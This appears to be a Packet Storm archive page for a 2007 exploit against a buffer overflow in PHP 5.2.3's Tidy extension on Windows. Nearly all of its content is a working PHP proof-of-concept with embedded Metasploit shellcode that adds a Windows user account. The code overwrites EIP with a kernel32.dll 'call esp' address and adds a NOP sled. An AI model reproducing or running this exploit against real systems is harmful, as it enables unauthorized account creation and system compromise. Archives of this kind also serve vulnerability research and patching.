what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

php523-overflow.txt

php523-overflow.txt
Posted Jun 20, 2007
Authored by rgod | Site retrogod.altervista.org

PHP version 5.2.3 Tidy extension local buffer overflow exploit for win32.

tags | exploit, overflow, local, php
systems | windows
SHA-256 | 77ab4ff0f5a046cb4cf44bd4a513d14d0712af937e419f340866aac22359816d

php523-overflow.txt

Change Mirror Download
<?php
//PHP 5.2.3 tidy_parse_string() & tidy_repair_string() local
//buffer overflow poc (win)
//rgod
//site: retrogod.altervista.org

//quickly tested on xp sp2, worked both from the cli and on apache
//let's have a look here: http://www.google.com/codesearch?hl=it&q=+tidy_parse_string&sa=N

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

# win32_adduser - PASS=tzu EXITFUNC=thread USER=sun Size=233 Encoder=JmpCallAdditive http://metasploit.com
$scode =
"\xfc\xbb\x0b\xad\x7d\x9a\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xf7\x45\x39\x9a\x07\x96\x49".
"\xdf\x3b\x1d\x31\xe5\x3b\x20\x25\x6e\xf4\x3a\x32\x2e\x2a\x3a\xaf".
"\x98\xa1\x08\xa4\x1a\x5b\x41\x7a\x85\x0f\x26\xba\xc2\x48\xe6\xf1".
"\x26\x57\x2a\xee\xcd\x6c\xfe\xd5\x29\xe7\x1b\x9e\x6d\x23\xe5\x4a".
"\xf7\xa0\xe9\xc7\x73\xe9\xed\xd6\x68\x9e\x12\x52\x6f\x4b\xa3\x38".
"\x54\x8f\x77\xf1\x54\xeb\xfc\xb2\x64\x76\xc2\x4b\x89\xf3\x83\xa7".
"\x1a\x73\x18\x15\x97\x1b\x28\x8e\xa1\x50\xa8\xe0\xb2\x66\xa9\x8b".
"\xdb\x5a\xf6\xba\xed\xc2\x5e\x34\xe9\x81\x9f\x3d\x5a\xed\xf0\x0c".
"\xba\x8d\x66\x09\xc5\xc7\x79\x7e\xc5\x30\xe6\xed\x5d\x90\x8c\x95".
"\xf8\xcc\x61\x05\x23\x62\x1b\xbd\x03\x0f\x90\x58\x36\xcf\x25\xd6".
"\xd8\x2f\xbe\x62\x50\x0f\x11\xd2\xde\x0b\x4d\xf2\xf8\xb3\xe3\x9f".
"\x70\x93\x97\x30\x1a\xb2\x0b\xa8\xae\x5b\xa1\x46\x6f\xe2\x2d\xca".
"\x06\x8a\xc4\x67\xad\x20\x76\xfc\x22\xb6\x0b\xdc\xcf\x43\x82\x3c".
"\x1f\xea\x1e\x79\x5f\xec\x9e\x81\x5f";

$EIP="\x8B\x51\x81\x7C"; //0x7C81518B call esp kernel32.dll
$NOP=str_repeat("\x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    20 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close